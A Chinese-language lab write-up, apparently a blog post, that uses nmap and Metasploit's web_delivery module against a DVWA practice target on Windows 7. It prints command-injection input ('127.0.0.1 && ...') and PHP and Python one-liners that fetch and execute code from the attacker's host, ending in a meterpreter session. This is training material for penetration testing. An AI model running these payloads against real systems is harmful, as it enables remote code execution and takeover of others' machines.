MSF模拟渗透测试攻击window实例

一次MSF模拟渗透测试攻击window实例

前言

一、什么是命令执行漏洞?

命令执行漏洞就是目标主机的安全性较低,而导致出现的命令执行漏洞,这次我们利用dvwa靶机完整的进行一次命令执行漏洞的利用取得目标主机的shell,并进行提权利用,获取目标主机的系统信息。

二、生成python脚本的payload,获取主机的权限

1.进行目标主机端口的扫描

代码如下(示例):
nmap -sV -T4 192.168.222.109

在这里插入图片描述
在里面发现有80端口的web服务端开启,并且是php文件。可以试一下利用生成php payload攻击。
(2)打开msf,使用模块
use exploit/multi/script/web_delivery
(3)执行options
(4)设置payload
set payload php/meterpreter/reverse_tcp
(5)设置target
在这里插入图片描述
设置target为php。
set target 1
(6)设置主机和端口
set lhost 192.168.222.131
(7)run后发现行不通,没有返回会话界面
在这里插入图片描述
(8)复制出现的php脚本到win7终端
php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://192.168.222.131:8080/z6XNrE’, false, stream_context_create([‘ssl’=>[‘verify_peer’=>false,‘verify_peer_name’=>false]])));”

(9)返回win7终端执行ping 127.0.0.1 &&php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://192.168.222.131:8080/z6XNrE’, false, stream_context_create([‘ssl’=>[‘verify_peer’=>false,‘verify_peer_name’=>false]])));”
在这里插入图片描述
出现php错误,行不通。
(10)php行不通,换个思路,看看目标主机是否有Python环境可以攻击利用

2.利用python脚本攻击利用

打开kali,在kali终端打开目标主机地址进入到dvwa界面,设置安全性为低,在命令执行漏洞那执行
(前提是在目标主机上下载phpstudy,将dvwa靶机放在www目录下)

在kali浏览器中输入192.168.222.109/dvwa打开dvwa即可。
在命令执行漏洞框中输入127.0.0.1 && ipconfig
出现各个ip的信息
在这里插入图片描述
可以利用命令执行漏洞进行攻击,这里利用python作为例子进行攻击

(1)设置payload为python
use exploit/multi/script/web_delivery
在这里插入图片描述
(2)设置target为0
set target 0
在这里插入图片描述
(3)设置端口为4554
在这里插入图片描述
(4)run后出现python脚本内容,复制到win7终端执行
python -c “import sys;import ssl;u=import(‘urllib’+{2:‘’,3:‘.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘http://192.168.222.131:8080/’, context=ssl._create_unverified_context());exec(r.read());”
在这里插入图片描述
(5)回车后成功进入到会话界面,输入sessions后出现会话界面
在这里插入图片描述
(6)输入sessions 2,回车,成功进入到meterpreter会话
在这里插入图片描述

(7)输入sysinfo,成功获取目标主机的系统信息,实验结束,成功获取目标主机的系统权限。
在这里插入图片描述

总结

此次实验是模拟MSF对window渗透测试攻击一个实例,是通过目标机的一个命令执行漏洞的利用,执行pyrhon脚本从而获得系统信息的一次实验攻击。是对MSF,信息收集,端口扫描,python脚本生成payload,漏洞利用攻击,后渗透meterpreter模块结合的一次完整的渗透测试攻击实验。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值